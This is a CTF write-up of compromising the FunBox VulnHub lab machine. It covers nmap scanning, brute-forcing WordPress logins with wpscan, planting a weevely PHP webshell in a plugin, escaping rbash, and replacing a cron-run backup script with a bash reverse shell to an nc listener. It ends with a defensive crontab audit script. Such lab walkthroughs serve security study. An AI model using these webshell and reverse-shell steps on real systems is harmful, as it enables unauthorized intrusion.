funbox vulnhub target machine writeup

Programmer Article Station 2022-07-15 14:30:04

FunBoxWriteup

0x00 Locating the target host

Scan the subnet with nmap to find the target

nmap -sn 16.16.16.0/24   // target IP found: 16.16.16.157
nmap -A 16.16.16.157 -v  // full nmap scan straight away
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: F8:FF:C2:4C:7B:F3 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Uptime guess: 26.140 days (since Sat Jul 18 08:21:27 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 16.16.16.157

0x01 Information gathering

Port 80 is open; visiting it, we are redirected to funbox.fritz.box, which cannot be reached.

Trying http://16.16.16.157/index.php does return content, but the page does not render properly and some CSS fails to load. F12 shows the URLs are being redirected to funbox.fritz.box. Solution: add a hosts entry on the attacking machine.

Directory fuzzing turns up a few URLs:

http://funbox.fritz.box/index.php
http://funbox.fritz.box/robots.txt 
http://funbox.fritz.box/secret/index.html //thought this would be a hint, but there is nothing there
http://funbox.fritz.box/wp-login.php

A wpscan scan identifies two users: admin and joe

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] joe
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Just try brute-forcing the passwords (for admin's password you need a larger wordlist; a small dictionary won't find it)

wpscan --url http://funbox.fritz.box/ -P /usr/share/password.lst --max-threads 100
[!] Valid Combinations Found:
 | Username: joe, Password: 12345
 | Username: admin, Password: iubire

0x02 getshell

Try logging into the WordPress backend: the joe account has few privileges, with no Themes or Plugins modules.
Log in with the admin account to reach the dashboard.


Here we try inserting a PHP webshell.

First generate a PHP webshell on Kali with weevely

weevely generate hehe /tmp/1.php # generate a backdoor named 1.php with password hehe

After copying the content of 1.php into the 404.php file, clicking Save gives an error; apparently updating file contents is not allowed here.

Taking a gamble, try again in the Plugins module to see whether it can be written there


It writes successfully, so connect with weevely

weevely http://16.16.16.157/wp-content/plugins/akismet/index.php hehe


We get a low-privilege shell; the next step is privilege escalation.

0x03 Privilege escalation

After getting the webshell, first gather some information


As usual, let's look at the home directories


We are pleasantly surprised to find two more users, and one of them, joe, looks familiar: it is the same name we used to log into the site earlier. Very likely the password is the same 12345, so let's try SSH

ssh aaa@qq.com


ls shows a file named mbox in joe's home directory; let's cat it

aaa@qq.com:~$ cat mbox
From aaa@qq.com  Fri Jun 19 13:12:38 2020
Return-Path: <aaa@qq.com>
X-Original-To: aaa@qq.com
Delivered-To: aaa@qq.com
Received: by funbox.fritz.box (Postfix, from userid 0)
        id 2D257446B0; Fri, 19 Jun 2020 13:12:38 +0000 (UTC)
Subject: Backups
To: <aaa@qq.com>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <aaa@qq.com>
Date: Fri, 19 Jun 2020 13:12:38 +0000 (UTC)
From: root <aaa@qq.com>

Hi Joe, please tell funny the backupscript is done.

From aaa@qq.com  Fri Jun 19 13:15:21 2020
Return-Path: <aaa@qq.com>
X-Original-To: aaa@qq.com
Delivered-To: aaa@qq.com
Received: by funbox.fritz.box (Postfix, from userid 0)
        id 8E2D4446B0; Fri, 19 Jun 2020 13:15:21 +0000 (UTC)
Subject: Backups
To: <aaa@qq.com>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <aaa@qq.com>
Date: Fri, 19 Jun 2020 13:15:21 +0000 (UTC)
From: root <aaa@qq.com>

Joe, WTF!?!?!?!?!?! Change your password right now! 12345 is an recommendation to fire you.

Summarizing the keywords: backups, backupscript, funny

With those keywords, switch to funny's home directory and have a look


But we seem to hit a snag. Googling the error: rbash is a restricted shell, and several escape methods are documented online; here a single command does it: bash -i


Following the earlier keywords, look for clues in funny's home directory

We find a backup.sh; this should be what mbox was hinting at


The content of .reminder.sh says the new admin is running backup.sh in a long-term test, so we can guess that backup.sh is executed repeatedly at some interval. The key takeaway: every so often, backup.sh is run with administrator privileges.

Checking permissions shows that this .backup.sh is readable, writable and executable by all users.

First, let's see what backup.sh currently contains


The next step is to overwrite this file: vim .backup.sh

#!/bin/bash
bash -i >& /dev/tcp/16.16.16.159/1234 0>&1

Meanwhile, start an nc listener on port 1234 on the attacking machine

nc -lvp 1234

Based on the earlier guess that backup.sh runs periodically, we just leave nc listening on 1234 and wait a while; maybe it runs every minute.

Wait quietly... after a few minutes a shell with root privileges pops.


Later I found that this step sometimes pops a shell as funny instead: both funny and root have cron jobs. funny runs backup.sh every two minutes and root runs it every five minutes, so this step sometimes yields funny's shell and sometimes root's. I guess I was fairly lucky.

Now, revisiting the content of .reminder.sh, it all makes sense

#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" aaa@qq.com
//funny's cron job: runs /home/funny/.backup.sh every two minutes
aaa@qq.com:/var/spool/cron/crontabs# cat funny 
cat funny
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.n8Fr20/crontab installed on Fri Jun 19 14:33:06 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
*/2 * * * * /home/funny/.backup.sh


--------------------------------------------------

//root's cron job: runs /home/funny/.backup.sh every five minutes
aaa@qq.com:/var/spool/cron/crontabs# cat root
cat root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.gcHh7z/crontab installed on Fri Jun 19 13:57:00 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
*/5 * * * * /home/funny/.backup.sh
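The root cause of this escalation is a cron job (root's `*/5` entry above) that executes a script anyone can edit. The following audit script is an added example, not from the writeup or the target machine: it reads a crontab file and flags each scheduled program that is group/world-writable or owned by someone other than root or the crontab's user. The fixture it builds under mktemp is constructed for the demo.

```shell
#!/bin/sh
# audit_crontab UID FILE: flag every program scheduled in crontab FILE that a
# user other than root or UID could modify (the weakness used in the writeup:
# root's crontab running the mode-777 /home/funny/.backup.sh).
# Prints one RISK line per finding; exit status 0 = clean, 1 = findings.
audit_crontab() {
    uid="$1" file="$2" findings=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|'#'*|[!0-9*@]*) continue ;;        # blank, comment, VAR=value
            '@'*) cmd=${line#*[[:space:]]} ;;     # @reboot / @daily style entry
            *) cmd=$(printf '%s\n' "$line" | awk '{$1=$2=$3=$4=$5=""; sub(/^ +/,""); print}') ;;
        esac
        script=${cmd%%[[:space:]]*}               # first word = program that runs
        if [ ! -e "$script" ]; then
            printf 'WARN %s: %s does not exist\n' "$file" "$script"; continue
        fi
        perms=$(stat -c '%A' "$script"); owner=$(stat -c '%u' "$script")
        writable=0
        case "$perms" in ?????w*|????????w*) writable=1 ;; esac   # g+w or o+w
        if [ "$writable" -eq 1 ] || { [ "$owner" -ne 0 ] && [ "$owner" -ne "$uid" ]; }; then
            printf 'RISK %s: %s (%s uid=%s) is modifiable by other users\n' \
                "$file" "$script" "$perms" "$owner"
            findings=$((findings + 1))
        fi
    done < "$file"
    [ "$findings" -eq 0 ]
}

# Constructed fixture (not from the target): one 777 hidden backup script, one 755 script.
make_fixture() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\ntar -czf /tmp/www.tgz /var/www\n' > "$dir/.backup.sh"
    chmod 777 "$dir/.backup.sh"
    printf '#!/bin/sh\necho ok\n' > "$dir/good.sh"
    chmod 755 "$dir/good.sh"
    printf '# m h dom mon dow command\n*/5 * * * * %s\n0 5 * * 1 %s -v\n' \
        "$dir/.backup.sh" "$dir/good.sh" > "$dir/crontab"
    printf '%s\n' "$dir"
}

fixture=$(make_fixture)
if audit_crontab "$(id -u)" "$fixture/crontab"; then
    echo "crontab is clean"
else
    echo "findings present, fix the flagged scripts (chmod 755, chown root)"
fi
rm -rf "$fixture"
```

Run it against each file in /var/spool/cron/crontabs (and /etc/cron.d) as root; the funny and root entries above would both produce a RISK line for /home/funny/.backup.sh.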

There should be more than one way to get root; hopefully I can dig up other approaches later...